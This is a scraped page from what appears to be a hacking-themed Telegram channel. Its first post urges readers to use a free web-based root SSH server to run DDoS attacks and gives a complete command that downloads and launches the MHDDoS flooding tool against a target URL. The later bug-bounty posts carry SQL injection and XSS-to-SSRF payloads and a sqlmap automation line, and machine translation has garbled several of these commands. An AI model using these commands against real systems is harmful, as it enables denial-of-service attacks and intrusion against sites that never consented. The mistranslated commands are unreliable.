💻ӉѦСҠіИԌ ҬЄѦӍ -Difusion
إظهار المزيد
659
المشتركون
+224 ساعات
+67 أيام
+8330 أيام
- المشتركون
- التغطية البريدية
- ER - نسبة المشاركة
جاري تحميل البيانات...
معدل نمو المشترك
جاري تحميل البيانات...
𝑭𝒓𝒆𝒆 𝒓𝒐𝒐𝒕 𝒔𝒔𝒉 𝒔𝒆𝒓𝒗𝒆𝒓 𝒕𝒆𝒓𝒎𝒊𝒏𝒂𝒕𝒐𝒓 (𝑹𝑼)
https://terminator.aeza.net/en/
Free root ssh server acces direct from a web browser to this server 15 min / sequence but illimited you can direct reconnect to contuinue what you do.... and launch your ddos script #lulzzzz
Like this one ;)
wget https://github.com/MatrixTM/MHDDoS/archive/refs/tags/Big-Update.zip && apt install unzip -y && unzip ./Big-Update.zip && apt install python3-pip -y && cd MHDDoS-Big-Update && pip install -r requirements.txt --break-system-packages && python3 start.py CFB https://YOUR.TARGET.HERE/ 5 2000 socks5.txt 2000 36000
ps : put your target url at the end of the cmd in the url feeld
#HackThePlanet
11110
Método simple pero efectivo para reducir su alcance, a veces ayuda a pensar simple.
WayBackUrls -Dates Dominio (.) Com |Grep '? Id ='
Carga útil: if (ahora () = sysdate (), dormir (8), 0)
#BugBountyTips #BugBounty
12300
El fuzzador HTTP recursivo más rápido, como un Ferrari 🏎️.Si se encuentra con "Socket: demasiados archivos abiertos", ¡simplemente escriba Ulimit -N 8129 antes de ejecutar Medusa!
github.com/riza/medusa
#BugBountyTips #BugBounty
GitHub - riza/medusa: Fastest recursive HTTP fuzzer, like a Ferrari.
Fastest recursive HTTP fuzzer, like a Ferrari. Contribute to riza/medusa development by creating an account on GitHub.
11100
Wfuzz por fuzzing en flujos de trabajo 🔍
Ayuda a descubrir contenido oculto dentro de los servidores web, por lo que es una herramienta poderosa para encontrar vectores de ataque.
Su concepto simple de reemplazar la "fuzz" con cargas útiles permite ataques de seguridad web complejos.
github.com/xmendez/wfuzz
#BugBountyTips #BugBounty
GitHub - xmendez/wfuzz: Web application fuzzer
Web application fuzzer. Contribute to xmendez/wfuzz development by creating an account on GitHub.
10100
Una línea para encontrar archivos JavaScript rápidamente utilizando múltiples herramientas:
echo objetivo \ .com |(Gau Hakrawler Evangider || Katana) |Grep -ie '.js' |Grep -iev '(.jsp | .json)' |ANEW JS.TXT
#BugBountyTips #BugBounty
8010
Obtenga puntos finales del archivo APK:
apktool d app.apk -o Uberapk;grep -phro "(https?: //) [\ w \ .-/]+[\" '\ ]" UBERAPK/| SED' S#"## G '|Nuevo |Grep -V "W3 \ | Android \ | Github \ | http: // schemas \ .Android \ | google \ | http: // goo \ .gl"
#BugBountyTips #BugBounty
7300
Opciones para usar al obtener subdominios vivos:
Dominios de gato.txt |httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -sc -cl -title -t 100 -fr -nc
#BugBountyTips #BugBounty
7510
Si ve un editor de página de vista previa, Junta, etc., y puede editar su contenido, intente colocar esta carga útil:
window.location.replace ('https: // cnn \ .com')
Si el DOC exportado contiene la página CNN, es vulnerable a la cadena XSS -> SSRF.
#BugBounty #BugBountyTips
6800
SHODAN Consultas de núcleos temperaturas públicas localmente:
para i en grep -ar severidad ~/núcleos -templados |Grep -eav 'cves.json | Templates -stats.json' |Grep -ae 'crítico | alto' |Grep -A http |awk -f ':' '/ 1/ {imprimir $ 1}';hacer gato $ i |Grep SHODAN-QUERY;hecho
#BugBountyTips #BugBounty
7100
Prueba esta increíble automatización de SQLI Oneliner:
subfinder -d testphp.vulnweb.com -alt -silent |Gau |Urldedupe |
gf sqli> sql.txt;sqlmap -m sql.txt -batch --dbs - -riesgo 2
-nivel 5-agente-random |tee -a sqli.txt
#BugBountyTips #BugBounty
7000